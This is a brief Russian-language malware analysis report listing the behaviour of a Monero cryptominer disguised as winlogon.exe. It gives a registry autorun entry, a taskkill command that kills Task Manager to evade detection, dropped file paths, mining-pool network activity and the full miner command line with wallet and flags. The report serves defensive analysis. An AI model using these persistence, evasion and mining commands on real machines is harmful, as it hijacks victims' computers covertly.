Техническая информация
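- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'xxsdcyiyi' = 'C:\xxs\winlogon.exe' (автозапуск при входе пользователя в систему; имя файла совпадает с системным winlogon.exe, но он расположен в C:\xxs, а не в <SYSTEM32>)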
- '<SYSTEM32>\taskkill.exe' /f /im Taskmgr.exe (принудительное завершение Диспетчера задач, что затрудняет обнаружение процесса пользователем)
- C:\xxs\winlogon.exe
- %WINDIR%\Temp\severxxs.exe
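- 'po##.#upportxmr.com':7777 (сетевое подключение; имя узла в отчёте замаскировано, порт совпадает с адресом пула в командной строке severxxs.exe)
- DNS ASK po##.#upportxmr.com (DNS-запрос того же узла)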
- ClassName: '' WindowName: ''
- 'C:\xxs\winlogon.exe'
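- '%WINDIR%\Temp\severxxs.exe' -B -o stratum+tcp://pool.supportxmr.com:7777 -u 455sUNJVbdNeXPxUq9Ha7zaauEUcdfMdHcTdfG4C6QrdKZxA4GiavMLGX13aaN6zYhJEtxHcNyMwwAUkfdSpw1eNTG75MXv -p s -k (запуск майнера: протокол stratum и адрес пула указывают, по-видимому, на добычу Monero; судя по синтаксису, -B — фоновый режим, -o — адрес пула, -u — кошелёк, -p — пароль, -k — keepalive)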